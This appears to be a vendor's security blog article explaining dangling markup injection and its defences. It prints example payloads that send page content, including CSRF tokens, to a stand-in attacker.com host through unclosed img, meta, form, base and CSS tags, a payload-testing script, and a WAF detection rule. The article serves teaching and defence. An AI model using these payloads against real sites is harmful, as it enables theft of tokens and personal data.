Dangling Markup Injection: Leaking CSRF Tokens Without JavaScript

InstaTunnel Team
Published by our engineering team

Understanding the Silent Data Exfiltration Technique That Bypasses Modern Web Security

Content Security Policy (CSP) and input filters have become increasingly effective at preventing traditional Cross-Site Scripting (XSS) attacks. Dangling markup injection gives attackers an alternative path: it exfiltrates sensitive data without executing any JavaScript. The technique relies on ordinary browser HTML parsing behavior to capture confidential information that appears in the page, including CSRF tokens, session identifiers, and personal data.

What is Dangling Markup Injection?

Dangling markup injection is a technique for capturing data cross-domain in situations where a full cross-site scripting attack isn’t possible. Unlike conventional XSS attacks that require script execution, dangling markup exploits the way browsers parse incomplete HTML tags and attributes.

The attack exploits an unclosed tag or attribute to gain access to confidential data that is either contained in the code of the target web page or entered into forms on it. The fundamental principle relies on the browser’s lenient parsing behavior: when encountering an unclosed attribute or tag, browsers continue reading subsequent content until they find the appropriate closing delimiter.

The Core Mechanism

The attack works by injecting HTML that contains an opening tag with an incomplete attribute. When a browser parses the response, it will look ahead until it encounters a single quotation mark to terminate the attribute, and everything up until that character will be treated as being part of the URL and will be sent to the attacker’s server within the URL query string.

Consider a vulnerable web application that embeds user-controllable data into its HTML response without proper sanitization:

<input type="text" name="search" value="USER_INPUT_HERE">

If the application fails to escape characters like > or ", an attacker can inject a malicious payload that breaks out of the existing context and introduces a new HTML element with an unclosed attribute.

How Dangling Markup Injection Works

Basic Attack Vector

The most straightforward implementation of this technique involves injecting an image tag with an unclosed src attribute. Here’s how the attack unfolds:

Original vulnerable HTML:

<input type="text" name="email" value="USER_CONTROLLED_INPUT">
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Attacker’s payload:

"><img src='https://attacker.com/collect?data=

Resulting HTML after injection:

<input type="text" name="email" value=""><img src='https://attacker.com/collect?data=
<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

The consequence of the attack is that the attacker can capture part of the application’s response following the injection point, which might contain sensitive data such as CSRF tokens, email messages, or financial data.

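When the browser parses this page, it treats everything between the injected src='https://attacker.com/collect?data= and the next single quote as part of the image URL. The markup shown above contains only double quotes, so the capture runs past the CSRF token field until a single quote appears later in the page. If that quote falls immediately after the token field, the browser automatically makes a GET request to: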

https://attacker.com/collect?data=<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">

Characters that cannot appear literally in a URL are percent-encoded before the request is sent, and raw tabs and newlines are stripped by the URL parser, so the attacker receives the content between the injection point and the closing delimiter in a form that is easy to decode.
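The capture step can be approximated offline. The sketch below is a simplified model, not a real HTML parser: the function name simulate_dangling_capture, the sample page, and the choice of which characters to leave unencoded are all assumptions made for illustration.

```python
from typing import Optional
from urllib.parse import quote


def simulate_dangling_capture(page: str, attr_open: str = "src='",
                              delimiter: str = "'") -> Optional[str]:
    """Approximate the URL a browser would request for an unclosed attribute."""
    start = page.find(attr_open)
    if start == -1:
        return None
    value_start = start + len(attr_open)
    end = page.find(delimiter, value_start)
    if end == -1:
        # No closing quote before the end of the document: the tag never
        # completes, so no request is made.
        return None
    raw_value = page[value_start:end]
    # URL parsers drop raw tabs and newlines instead of encoding them.
    cleaned = raw_value.translate({ord(ch): None for ch in "\t\r\n"})
    # Percent-encode everything except common URL punctuation. Real browsers
    # encode a narrower set of characters, so this is only an approximation.
    return quote(cleaned, safe=":/?=&")


# Hypothetical page: the apostrophe in "Don't" is the next single quote.
PAGE = (
    '<input type="text" name="email" value="">'
    "<img src='https://attacker.com/collect?data=\n"
    '<input type="hidden" name="csrf_token" value="a8d7f6e5c4b3a2">\n'
    "<p>Don't forget to save your changes.</p>"
)

if __name__ == "__main__":
    print(simulate_dangling_capture(PAGE))
```

In this model the hidden field ends up inside the requested URL only because a single quote appears later in the page. With no later quote the function returns None, which mirrors the case where the payload silently fails.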

Alternative Exploitation Techniques

While image tags are the most common vector, attackers can exploit various HTML elements that make external requests:

1. Meta Refresh Tags

"><meta http-equiv="refresh" content="0;url=https://attacker.com/exfil?

This payload redirects the page while capturing subsequent content in the URL parameters.

2. Form Action Manipulation

Attackers can inject incomplete form tags to redirect form submissions:

"><form action='https://attacker.com/capture?

Any form data submitted on the page will be sent to the attacker’s server along with the captured markup.

3. Base Tag Exploitation

The target attribute of the base tag sets the default window name used by every link on the page. If an attacker injects a base tag with an unclosed target attribute, that window name absorbs all the markup from the injection point up to the next matching quote.

<a href="https://attacker.com/payload.html"><font size=100 color=red>Click here</font></a>
<base target='

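When a user clicks any link on the page, the destination opens in a window whose window.name property contains all HTML content up to the next single quote. If the link leads to the attacker’s page, script running there can read window.name, because the value is attached to the window rather than to the origin that set it.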

4. CSS-Based Exfiltration

CSS supports importing external CSS files using the @import rule, which can be abused along with CSS query selectors to exfiltrate arbitrary HTML content on the page.

<style>
input[name=csrf_token][value^=a]{
  background-image: url(https://attacker.com/exfil/a);
}
input[name=csrf_token][value^=b]{
  background-image: url(https://attacker.com/exfil/b);
}
</style>

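Each rule uses a CSS attribute selector, not a regular expression: [value^=a] matches an input whose value begins with the letter a. When a rule matches, the browser requests the corresponding URL as a background image, which reveals that character to the attacker. Repeating the process with longer prefixes enables character-by-character extraction of sensitive tokens. In practice, hidden inputs are not rendered, so attackers typically combine the attribute selector with a sibling or parent selector that targets a visible element.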

Why Dangling Markup is Particularly Dangerous

Bypasses Traditional XSS Defenses

Dangling markup can work even when a CSP blocks all script execution. It doesn’t require JavaScript, and it can steal CSRF tokens, session identifiers, and other sensitive data that appear in the page.

Modern web applications typically implement multiple layers of defense:

  1. Input validation and filtering - Blocks <script> tags and JavaScript event handlers
  2. Content Security Policy (CSP) - Prevents execution of inline scripts and restricts resource loading
  3. XSS Auditor / XSS Filter - Browser-based detection of malicious scripts (a legacy feature that has since been removed from Chrome)
  4. Output encoding - Escapes dangerous characters in user input

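Dangling markup injection can slip past the script-focused protections in this list, and past output encoding that is incomplete or applied in the wrong context, because: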

  • No JavaScript execution required - The attack relies purely on HTML structure and browser behavior
  • Legitimate HTML elements - Uses standard tags like <img>, <meta>, and <form> that applications often allow
  • Subtle syntax - The attack doesn’t introduce obviously malicious patterns that filters typically detect
  • Browser-native behavior - Exploits fundamental HTML parsing rules rather than security vulnerabilities

Real-World Impact Scenarios

CSRF Token Theft

The most critical application of dangling markup injection involves stealing CSRF tokens. Once an attacker obtains a valid CSRF token associated with a user’s session, they can:

  • Perform unauthorized state-changing operations
  • Modify user account settings
  • Initiate financial transactions
  • Change passwords or email addresses
  • Delete user data

Sensitive Information Leakage

Beyond CSRF tokens, attackers can exfiltrate:

  • Personal Identifiable Information (PII) - Names, addresses, phone numbers
  • Financial data - Credit card details, bank account information
  • Session identifiers - Enabling session hijacking attacks
  • Email content - Messages displayed on the page
  • Private messages - Chat conversations, notifications
  • API keys and secrets - Exposed in hidden form fields or JavaScript variables

Reconnaissance and Profiling

Even when immediate exploitation isn’t possible, captured data provides valuable intelligence:

  • Application structure and hidden functionality
  • Internal parameter names and formats
  • CSRF token generation patterns
  • User behavior and interaction patterns

Browser Behavior and Parsing Quirks

How Browsers Handle Unclosed Attributes

Modern browsers implement lenient HTML parsing based on the HTML5 specification. This permissive approach prioritizes user experience over strict syntax enforcement. When encountering an unclosed attribute:

  1. The browser enters an attribute value context
  2. It continues consuming characters until finding a matching quote
  3. Quote characters of the other kind are treated as literal characters
  4. The attribute remains open across multiple lines and nested elements
  5. Only the matching closing quote terminates the attribute; if the document ends first, the unfinished tag is discarded and never triggers a request

This behavior, designed to handle malformed HTML gracefully, creates the exact vulnerability that dangling markup exploits.

URL Encoding and Data Transmission

Before the request is sent, the browser percent-encodes characters that cannot appear literally in a URL. Attackers therefore receive the captured data in a predictable format, for example:

https://attacker.com/collect?data=%3Cinput%20type%3D%22hidden%22%20name%3D%22csrf%22%20value%3D%22token123%22%3E

Decoding this URL reveals the original HTML structure, allowing attackers to extract specific values programmatically.
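As a rough illustration of that decoding step, the following sketch parses the example URL above with Python’s standard library. The function name extract_hidden_fields and the assumption that the captured markup arrives in a query parameter named data are illustrative choices.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches name="..." followed by value="..." inside captured markup.
FIELD_PATTERN = re.compile(r'name="([^"]+)"\s+value="([^"]*)"')


def extract_hidden_fields(captured_url: str, param: str = "data") -> dict:
    """Decode the captured query parameter and pull out name/value pairs."""
    query = urlsplit(captured_url).query
    # parse_qs splits the query string and percent-decodes each value.
    markup = parse_qs(query).get(param, [""])[0]
    return dict(FIELD_PATTERN.findall(markup))


CAPTURED = (
    "https://attacker.com/collect?data=%3Cinput%20type%3D%22hidden%22"
    "%20name%3D%22csrf%22%20value%3D%22token123%22%3E"
)

if __name__ == "__main__":
    print(extract_hidden_fields(CAPTURED))
```

Defenders can use the same few lines when reviewing proxy or server logs to confirm what a suspicious request actually carried.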

Chrome’s Mitigation Attempts

Chrome mitigates dangling markup attacks by refusing to load resources, such as those referenced by img tags, whose URLs contain both a raw newline and a raw angle bracket (<).

This browser-level mitigation blocks many basic dangling markup payloads but doesn’t eliminate the attack surface entirely. Attackers can:

  • Use alternative HTML elements not subject to URL restrictions
  • Exploit protocol schemes other than HTTP (e.g., FTP)
  • Employ DOM-based techniques that don’t rely on URL parameters
  • Leverage user interaction-based vectors

Bypassing Content Security Policy (CSP)

While CSP effectively prevents many XSS attacks, dangling markup injection presents unique challenges for CSP-based defenses.

CSP Limitations Against Dangling Markup

It’s quite common for a CSP to block resources like script. However, many CSPs do allow image requests, meaning you can often use img elements to make requests to external servers to disclose CSRF tokens.

A typical CSP might include:

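Content-Security-Policy: script-src 'self'; object-src 'none'

This policy restricts scripts but sets neither img-src nor default-src, so images may load from any origin and the application remains vulnerable to basic dangling markup attacks. Adding default-src 'self' would change that, because img-src falls back to default-src when it is not set explicitly.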
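Whether a given policy lets images leave the origin depends on img-src and, when that directive is absent, on default-src. The sketch below checks this fallback for a header value. It is a simplified model under stated assumptions: the function names are hypothetical, and any source other than 'self' or 'none' (including schemes such as data:) is treated as potentially remote.

```python
from typing import Dict, List


def parse_csp(header_value: str) -> Dict[str, List[str]]:
    """Split a CSP header value into {directive: [sources]}."""
    policy: Dict[str, List[str]] = {}
    for part in header_value.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        # When a directive is repeated, only its first occurrence counts.
        policy.setdefault(tokens[0].lower(), tokens[1:])
    return policy


def may_load_remote_images(header_value: str) -> bool:
    """Return True if the policy appears to allow images from other origins."""
    policy = parse_csp(header_value)
    # img-src falls back to default-src when it is not set.
    sources = policy.get("img-src", policy.get("default-src"))
    if sources is None:
        return True  # neither directive present: images are unrestricted
    local_only = {"'self'", "'none'"}
    return any(source.lower() not in local_only for source in sources)


if __name__ == "__main__":
    for header in (
        "script-src 'self'",
        "default-src 'self'; script-src 'self' 'unsafe-inline'",
        "default-src 'self'; img-src *",
    ):
        print(header, "->", may_load_remote_images(header))
```

Note that form-action and base-uri do not fall back to default-src, so a check like this would need separate handling for those directives.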

CSP Directives for Mitigation

A policy that restricts img-src prevents some dangling markup exploits, because an img tag is the easiest way to capture data with no user interaction. It does not prevent other exploits, such as those that inject an anchor tag with a dangling href attribute, which sends the captured data when the user clicks the link.

More restrictive policies might include:

Content-Security-Policy: default-src 'none'; img-src 'self'; base-uri 'none'

However, even strict CSPs can be bypassed through the techniques described below.

DOM-Based Dangling Markup Techniques

Even from the most CSP restricted environments you can still exfiltrate data with some user interaction using the base target attribute.

Example exploitation with restrictive CSP:

<a href="http://attacker.com/payload.html">
  <font size=100 color=red>You must click me</font>
</a>
<base target='

Because the target attribute inside the base tag is unclosed, its value absorbs the HTML content up to the next single quote. If the victim clicks the link, that content becomes the window.name of the page that opens, where the attacker’s script can read it.

Iframe Name Exploitation

Attackers can abuse iframe name attributes to bypass CSP restrictions:

<iframe src="vulnerable-page.php?input="><iframe name='" onload="exfiltrate(this.contentWindow)">
</iframe>

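The inner iframe’s name attribute captures subsequent page content. Script on the attacker’s page that frames the vulnerable page (exfiltrate is a placeholder for the attacker’s own function) can then attempt to read that name and transmit it to an attacker-controlled server.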

Advanced Exploitation Techniques

Automated Token Extraction

Sophisticated attackers deploy automated systems to extract specific values from captured markup. CSS attribute selectors can be used to exfiltrate CSRF tokens character by character: the attacker injects many selectors, and each one triggers a request only when the token starts with a given prefix.

<style>
input[name=csrftoken][value^=a]{ background-image: url(https://attacker.com/exfil/a); }
input[name=csrftoken][value^=b]{ background-image: url(https://attacker.com/exfil/b); }
/* ... continued for all characters ... */
input[name=csrftoken][value^=a0]{ background-image: url(https://attacker.com/exfil/a0); }
input[name=csrftoken][value^=a1]{ background-image: url(https://attacker.com/exfil/a1); }
</style>

Based on which URLs receive requests, attackers reconstruct the complete token value. Tools like cssrf automate this entire process.
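The reconstruction logic is essentially a prefix search. The sketch below simulates it locally, with str.startswith standing in for the [value^=...] selector and no network traffic involved. The function names and the lowercase-alphanumeric alphabet are assumptions for illustration.

```python
import string

# Assumed token alphabet; a real token may use a different character set.
ALPHABET = string.ascii_lowercase + string.digits


def selector_matches(token: str, prefix: str) -> bool:
    """Stand-in for the CSS selector input[value^=prefix]."""
    return token.startswith(prefix)


def recover_token(token: str, alphabet: str = ALPHABET) -> str:
    """Extend the known prefix one character at a time until nothing matches."""
    known = ""
    while True:
        hit = next(
            (ch for ch in alphabet if selector_matches(token, known + ch)),
            None,
        )
        if hit is None:
            # No selector fired: the token is complete, or the next
            # character lies outside the assumed alphabet.
            return known
        known += hit


if __name__ == "__main__":
    print(recover_token("a8d7f6e5c4b3a2"))
```

Each round needs one selector per candidate character, which is why the injected stylesheets grow large and why limiting where styles can come from cuts this vector off.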

Multi-Stage Attacks

Dangling markup often serves as the initial phase in complex attack chains:

  1. Reconnaissance - Extract page structure and identify sensitive fields
  2. Token capture - Steal CSRF tokens using dangling markup
  3. Session hijacking - Use captured session identifiers
  4. Privilege escalation - Perform administrative actions with stolen credentials
  5. Data exfiltration - Access sensitive information using elevated privileges

Persistent Attacks

By injecting payloads into stored data (comments, profiles, messages), attackers create persistent dangling markup attacks that affect every user viewing the compromised content. This transforms a single vulnerability into a wide-scale data harvesting operation.

Real-World Vulnerabilities and Case Studies

Social Media Platforms

Social media applications frequently allow limited HTML in user-generated content (comments, posts, bios). Insufficient sanitization has led to dangling markup vulnerabilities where attackers:

  • Captured authentication tokens from victim profiles
  • Exfiltrated private message previews
  • Harvested user session data
  • Built detailed user behavior profiles

E-commerce Websites

Online shopping platforms have been exploited through dangling markup in:

  • Product review sections
  • Customer support ticket systems
  • Wishlist and shopping cart features
  • Payment form validation messages

Captured data included credit card information, billing addresses, and order history.

Email Web Clients

Webmail services represent prime targets because:

  • Emails contain highly sensitive information
  • HTML rendering is necessary for formatted messages
  • Users expect rich content from legitimate senders
  • Multiple email accounts may be accessed from single sessions

Dangling markup in email content has enabled attackers to:

  • Steal inbox content
  • Capture email addresses and contact lists
  • Harvest authentication codes sent via email
  • Monitor correspondence in real-time

Comprehensive Prevention and Mitigation Strategies

Input Validation and Sanitization

You can prevent dangling markup attacks using the same general defenses for preventing cross-site scripting, by encoding data on output and validating input on arrival.

Strict Input Validation

Implement whitelisting-based validation that only allows explicitly permitted characters and patterns:

import re

# Allowlist: letters, digits, spaces, and basic punctuation only
ALLOWED_PATTERN = re.compile(r'[a-zA-Z0-9 .,!?-]+')
MAX_LENGTH = 200

def validate_user_input(input_string):
    # Reject oversized input before running the pattern
    if len(input_string) > MAX_LENGTH:
        raise ValueError("Input too long")

    # fullmatch() requires the entire string to match; match() with '$'
    # would still accept a trailing newline
    if not ALLOWED_PATTERN.fullmatch(input_string):
        raise ValueError("Invalid characters detected")

    return input_string

Context-Aware Output Encoding

Apply appropriate encoding based on where data will be rendered:

import html

def safe_html_render(user_data):
    # HTML entity encoding for display in HTML context
    return html.escape(user_data, quote=True)

The quote=True parameter ensures both single and double quotes are escaped, preventing breakout from attribute contexts.
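To see the effect on the payload from earlier in this article, the following sketch renders the email field with escaping applied. The helper name render_email_field is hypothetical, and real applications would normally rely on their template engine rather than string formatting.

```python
import html


def render_email_field(user_value: str) -> str:
    """Render the email input with the user value escaped for an attribute."""
    escaped = html.escape(user_value, quote=True)
    return '<input type="text" name="email" value="{}">'.format(escaped)


# The dangling markup payload discussed above.
PAYLOAD = "\"><img src='https://attacker.com/collect?data="

RENDERED = render_email_field(PAYLOAD)

if __name__ == "__main__":
    print(RENDERED)
```

After escaping, the quote and angle bracket characters arrive as entities, so the payload stays inside the value attribute and no new img element is created.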

Content Security Policy Configuration

Prevention methods include strict HTML attribute encoding, CSP restrictions on img-src, form-action, and base-uri, and input validation that detects incomplete tags.

Restrictive CSP Headers

Implement a defense-in-depth CSP that limits multiple attack vectors:

Content-Security-Policy:
  default-src 'none';
  script-src 'self' 'nonce-{random}';
  style-src 'self';
  img-src 'self';
  font-src 'self';
  connect-src 'self';
  frame-src 'none';
  base-uri 'none';
  form-action 'self';
  frame-ancestors 'none';

Key directives for dangling markup prevention:

  • img-src 'self' - Prevents external image loading
  • base-uri 'none' - Stops an injected base tag from changing the document’s base URL (it does not restrict the base target attribute)
  • form-action 'self' - Restricts form submission destinations
  • connect-src 'self' - Limits AJAX and WebSocket connections

CSP Reporting

Enable CSP violation reporting to detect attempted attacks:

Content-Security-Policy: default-src 'self'; report-uri /csp-violation-report

Monitor and analyze reports to identify attack patterns and vulnerable endpoints.

Server-Side Protections

Response Header Security

Implement additional security headers:

X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=(), camera=()
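One way to apply these headers consistently is a small piece of middleware. The sketch below uses plain WSGI so that it does not depend on any particular framework. The class name SecurityHeadersMiddleware and the demo application are assumptions, and most frameworks offer their own hooks for the same job.

```python
SECURITY_HEADERS = [
    ("X-Content-Type-Options", "nosniff"),
    ("X-Frame-Options", "DENY"),
    ("Referrer-Policy", "no-referrer"),
    ("Permissions-Policy", "geolocation=(), microphone=(), camera=()"),
]


class SecurityHeadersMiddleware:
    """WSGI middleware that adds security headers the app did not set."""

    def __init__(self, app, extra_headers=SECURITY_HEADERS):
        self.app = app
        self.extra_headers = list(extra_headers)

    def __call__(self, environ, start_response):
        def patched_start_response(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            # Keep headers the application chose; add only the missing ones.
            merged = list(headers) + [
                (name, value)
                for name, value in self.extra_headers
                if name.lower() not in present
            ]
            return start_response(status, merged, exc_info)

        return self.app(environ, patched_start_response)


def demo_app(environ, start_response):
    """Tiny placeholder application used only to exercise the middleware."""
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [b"<p>ok</p>"]


application = SecurityHeadersMiddleware(demo_app)
```

Leaving application-set headers untouched lets individual views opt into a different value, for example a less strict Referrer-Policy on a single page.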

DOM Sanitization Libraries

Use battle-tested sanitization libraries that understand HTML parsing intricacies:

JavaScript (client-side):

import DOMPurify from 'dompurify';

function sanitizeHTML(dirty) {
    return DOMPurify.sanitize(dirty, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong'],
        ALLOWED_ATTR: [],
        KEEP_CONTENT: true
    });
}

Python (server-side):

from bleach import clean

def sanitize_html(user_input):
    allowed_tags = ['b', 'i', 'em', 'strong', 'p']
    allowed_attrs = {}
    
    return clean(
        user_input,
        tags=allowed_tags,
        attributes=allowed_attrs,
        strip=True
    )

Application Architecture Considerations

Separation of Contexts

Strictly separate different security contexts:

  • Never mix user-controlled data with sensitive information in the same HTML structure
  • Use separate pages or AJAX endpoints for operations involving CSRF tokens
  • Implement token delivery through HTTP headers rather than HTML body

Token Protection Strategies

CSRF tokens should be generated on the server, either once per user session or once per request. Per-request tokens are more secure than per-session tokens because a stolen token can be exploited only within a very short window.

Best practices for CSRF token management:

  1. Server-side generation only - Never generate tokens in JavaScript
  2. Strong randomness - Use cryptographically secure random number generators
  3. Session binding - Tie tokens to specific user sessions
  4. Short expiration - Implement time-based token invalidation
  5. HTTP-only cookies - Prevent JavaScript access to session cookies
  6. SameSite cookie attribute - Restrict cross-origin cookie transmission
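Session binding and short expiration from the list above can be combined in one token format. The following is a minimal sketch, assuming a token layout of issued_at.nonce.mac and a 15-minute lifetime. The function names, the layout, and the lifetime are illustrative choices rather than a standard.

```python
import hashlib
import hmac
import secrets
import time


def issue_token(session_id: str, secret_key: bytes, now=None) -> str:
    """Create a token bound to the session and stamped with its issue time."""
    issued_at = int(time.time() if now is None else now)
    nonce = secrets.token_urlsafe(16)  # cryptographically secure randomness
    message = f"{session_id}:{issued_at}:{nonce}".encode()
    mac = hmac.new(secret_key, message, hashlib.sha256).hexdigest()
    return f"{issued_at}.{nonce}.{mac}"


def verify_token(token: str, session_id: str, secret_key: bytes,
                 max_age_seconds: int = 900, now=None) -> bool:
    """Check the MAC first, then reject tokens older than max_age_seconds."""
    parts = token.split(".")
    if len(parts) != 3:
        return False
    issued_text, nonce, mac = parts
    if not (issued_text.isascii() and issued_text.isdigit()):
        return False
    message = f"{session_id}:{issued_text}:{nonce}".encode()
    expected = hmac.new(secret_key, message, hashlib.sha256).hexdigest()
    # Compare as bytes in constant time; bytes avoid errors on non-ASCII input.
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return False
    current = time.time() if now is None else now
    return 0 <= current - int(issued_text) <= max_age_seconds
```

A token leaked through dangling markup then stops working once it ages out, and it is useless in any other session.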

Double-Submit Cookie Pattern

The most secure implementation of the Double Submit Cookie pattern is the Signed Double-Submit Cookie, which explicitly ties tokens to the user’s authenticated session. Always bind the CSRF token explicitly to session-specific data and use a Hash-based Message Authentication Code (HMAC) with a server-side secret key.

Implementation example:

import hmac
import hashlib
import secrets

def generate_csrf_token(session_id, secret_key):
    # Generate random token
    random_token = secrets.token_urlsafe(32)
    
    # Create HMAC signature binding token to session
    signature = hmac.new(
        secret_key.encode(),
        f"{session_id}:{random_token}".encode(),
        hashlib.sha256
    ).hexdigest()
    
    # Combine token and signature
    return f"{random_token}.{signature}"

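def validate_csrf_token(token, session_id, secret_key):
    try:
        random_token, signature = token.split('.')
    except (AttributeError, ValueError):
        # Token is missing, not a string, or not in "token.signature" form
        return False

    expected_signature = hmac.new(
        secret_key.encode(),
        f"{session_id}:{random_token}".encode(),
        hashlib.sha256
    ).hexdigest()

    # Constant-time comparison; encoding avoids errors on non-ASCII input
    return hmac.compare_digest(signature.encode(), expected_signature.encode())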

Detection and Monitoring

WAF Rules

Configure Web Application Firewall (WAF) rules to detect dangling markup patterns:

# ModSecurity rule example
SecRule REQUEST_BODY "@rx <(?:img|iframe|form|base|meta|link)[^>]*(?:src|href|action|target)\s*=\s*['\"][^'\"]*$" \
    "id:100001,\
    phase:2,\
    deny,\
    log,\
    msg:'Potential dangling markup injection detected'"
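Before deploying a rule like this, it helps to check what the pattern does and does not catch. The sketch below runs the same regular expression through Python’s re module against a few sample inputs. Python’s regex engine is not identical to the one ModSecurity uses, so treat this as an approximation, and note that the helper name looks_like_dangling_markup is hypothetical.

```python
import re

# Same pattern as the ModSecurity rule above, written as a Python raw string.
DANGLING_ATTR = re.compile(
    r"""<(?:img|iframe|form|base|meta|link)[^>]*(?:src|href|action|target)\s*=\s*['"][^'"]*$"""
)


def looks_like_dangling_markup(value: str) -> bool:
    """Return True if the value ends inside an unclosed URL-bearing attribute."""
    return DANGLING_ATTR.search(value) is not None


SAMPLES = {
    "unclosed img src": "\"><img src='https://attacker.com/collect?data=",
    "unclosed base target": "<base target='",
    "closed img tag": "<img src='logo.png'>",
    "unclosed meta refresh": (
        "\"><meta http-equiv=\"refresh\" "
        "content=\"0;url=https://attacker.com/exfil?"
    ),
}

if __name__ == "__main__":
    for label, sample in SAMPLES.items():
        print(label, "->", looks_like_dangling_markup(sample))
```

The meta refresh sample is not flagged because the pattern’s attribute list does not include content, which suggests the rule may need extending before it covers every vector described in this article.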

Anomaly Detection

Monitor application logs for suspicious patterns:

  • Unusually long URL parameters
  • Multiple requests with HTML entity encoding
  • Patterns matching unclosed HTML attributes
  • Requests originating from unexpected external domains
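The first three patterns in this list can be approximated with a simple log filter. The sketch below flags query parameters that are unusually long or that decode to markup-like content. The length threshold, the regular expression, and the function name suspicious_params are assumptions that would need tuning against real traffic.

```python
import re
from urllib.parse import parse_qsl, urlsplit

MAX_PARAM_LENGTH = 512  # assumed threshold; tune for the application

# Decoded values that open a tag or start a quoted attribute.
MARKUP_HINT = re.compile(r"<\s*[a-zA-Z!/]|=\s*[\"']")


def suspicious_params(request_url: str, max_len: int = MAX_PARAM_LENGTH):
    """Return (name, reasons) pairs for query parameters worth reviewing."""
    findings = []
    query = urlsplit(request_url).query
    # parse_qsl percent-decodes values, so encoded payloads are inspected too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        reasons = []
        if len(value) > max_len:
            reasons.append("long value")
        if MARKUP_HINT.search(value):
            reasons.append("markup-like content")
        if reasons:
            findings.append((name, reasons))
    return findings


if __name__ == "__main__":
    logged = (
        "https://shop.example/search?q=%22%3E%3Cimg%20src%3D%27"
        "https%3A%2F%2Fattacker.com%2F%3F"
    )
    print(suspicious_params(logged))
```

A filter like this will produce false positives on applications that legitimately accept markup, so it works better as a signal for review than as a blocking control.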

User Behavior Analytics

Track unusual activities that might indicate exploitation:

  • Multiple failed form submissions
  • Rapid sequential requests to different endpoints
  • Unexpected external resource loading attempts
  • Changes in user agent or referrer patterns

Testing for Dangling Markup Vulnerabilities

Manual Testing Methodology

  1. Identify injection points - Test all user input fields, URL parameters, HTTP headers
  2. Test character filtering - Verify which characters are blocked: < > " ' /
  3. Inject basic payloads - Try simple incomplete tags: "><img src='http://attacker.com?
  4. Examine source code - Review rendered HTML to confirm injection
  5. Verify data exfiltration - Monitor attacker-controlled server for incoming requests
  6. Test CSP effectiveness - Attempt bypasses using alternative elements

Automated Scanning

Use specialized tools and scripts:

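import requests

def extract_context(text, payload, radius=40):
    # Return the text surrounding the first occurrence of the payload
    index = text.find(payload)
    if index == -1:
        return ''
    start = max(0, index - radius)
    return text[start:index + len(payload) + radius]

def test_dangling_markup(url, parameter):
    # Only run this against applications you are authorized to test
    payloads = [
        '"><img src="http://attacker.com?',
        "'><img src='http://attacker.com?",
        '"><iframe src="http://attacker.com?',
        '"><meta http-equiv="refresh" content="0;url=http://attacker.com?',
        '"><base target="',
    ]

    results = []
    for payload in payloads:
        test_data = {parameter: payload}
        # A timeout keeps the scan from hanging on unresponsive endpoints
        response = requests.post(url, data=test_data, timeout=10)

        # Check if payload appears unencoded in response
        if payload in response.text:
            results.append({
                'payload': payload,
                'vulnerable': True,
                'context': extract_context(response.text, payload)
            })

    return results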

Penetration Testing Checklist

  • [ ] Test all input fields for HTML injection
  • [ ] Verify quote character filtering
  • [ ] Check for angle bracket restrictions
  • [ ] Test attribute-based injections
  • [ ] Attempt CSP bypasses
  • [ ] Verify CSRF token exposure
  • [ ] Test stored vs reflected injection
  • [ ] Evaluate user interaction requirements
  • [ ] Check browser-specific behaviors
  • [ ] Test mobile application endpoints
  • [ ] Verify API endpoint security

Developer Security Guidelines

Secure Coding Practices

  1. Assume all input is malicious - Treat user data as untrusted by default
  2. Use framework protections - Leverage built-in security features of modern frameworks
  3. Apply defense in depth - Implement multiple overlapping security layers
  4. Regular security training - Keep development teams updated on emerging threats
  5. Code review focus - Specifically review HTML rendering logic and user input handling

Framework-Specific Recommendations

React

// Automatic escaping by default
function SafeComponent({ userInput }) {
    return <div>{userInput}</div>;  // Safe - React escapes by default
}

// Dangerous - explicitly disabled escaping
function UnsafeComponent({ userInput }) {
    return <div dangerouslySetInnerHTML={{__html: userInput}} />;  // Vulnerable
}

Angular

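// Use built-in sanitization
import { Injectable, SecurityContext } from '@angular/core';
import { DomSanitizer } from '@angular/platform-browser';

// SafeHtmlService is an illustrative wrapper name
@Injectable({ providedIn: 'root' })
export class SafeHtmlService {
    constructor(private sanitizer: DomSanitizer) {}

    // Returns the sanitized HTML string, or null for empty input
    getSafeHtml(userInput: string): string | null {
        return this.sanitizer.sanitize(SecurityContext.HTML, userInput);
    }
}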

Django

{# Template auto-escaping (enabled by default) #}
{{ user_input }}  {# Safe - automatically escaped #}

{# Explicitly disabling escaping is dangerous #}
{{ user_input|safe }}  {# Vulnerable #}

Security Review Checklist

Before deploying code that handles user input:

  • [ ] All user input is validated against a whitelist
  • [ ] Output encoding is applied contextually
  • [ ] CSP headers are properly configured
  • [ ] CSRF tokens are securely implemented
  • [ ] No direct HTML concatenation with user data
  • [ ] Sanitization libraries are up to date
  • [ ] Security tests include dangling markup scenarios
  • [ ] Monitoring and logging are properly configured

Conclusion

Cross-Site Scripting (XSS) can defeat all CSRF mitigation techniques, so CSRF tokens protect an application only when it is also free of injection flaws. Dangling markup injection demonstrates that this attack surface extends beyond traditional XSS to include subtle HTML parsing behaviors.

This technique highlights the importance of security approaches that go beyond blocking obvious attack vectors. To reduce the risk of a dangling markup attack, test web applications for HTML injection, validate user input and encode it on output, deploy a content security policy, and use browsers that mitigate dangling markup.

Key Takeaways

  1. Dangling markup doesn’t require JavaScript - Making it effective against script-focused CSP rules and XSS filters
  2. Multiple exploitation vectors exist - Images, forms, base tags, meta redirects, and CSS all provide attack surfaces
  3. Browser behavior enables attacks - Lenient HTML parsing creates the vulnerability
  4. Defense requires multiple layers - No single mitigation completely eliminates the risk
  5. CSRF tokens remain valuable - Despite potential exposure through dangling markup, they’re still essential
  6. Continuous monitoring is crucial - Detection and response capabilities are as important as prevention

Future Considerations

As web applications evolve, new dangling markup vectors will likely emerge. Browser vendors continue implementing mitigations, but the fundamental HTML parsing behavior that enables these attacks remains necessary for backward compatibility. Security professionals must stay informed about emerging techniques and continually reassess application security postures.

The relationship between usability and security creates inherent tension - allowing rich HTML content improves user experience but expands attack surfaces. Organizations must carefully evaluate their risk tolerance and implement security controls proportional to the sensitivity of protected data.

